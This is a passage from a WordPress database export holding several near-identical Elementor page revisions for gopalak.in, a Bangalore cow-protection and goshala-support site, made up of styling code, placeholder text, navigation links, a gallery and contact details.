*/\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:31:15','2022-10-11 05:01:15','',1373,'https://gopalak.in/?p=1603',0,'revision','',0),(1604,1,'2022-10-11 10:31:15','2022-10-11 05:01:15','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:31:15','2022-10-11 05:01:15','',1373,'https://gopalak.in/?p=1604',0,'revision','',0),(1605,1,'2022-10-11 10:32:43','2022-10-11 05:02:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 10:32:43','2022-10-11 05:02:43','',1373,'https://gopalak.in/?p=1605',0,'revision','',0),(1606,1,'2022-10-11 10:32:43','2022-10-11 05:02:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 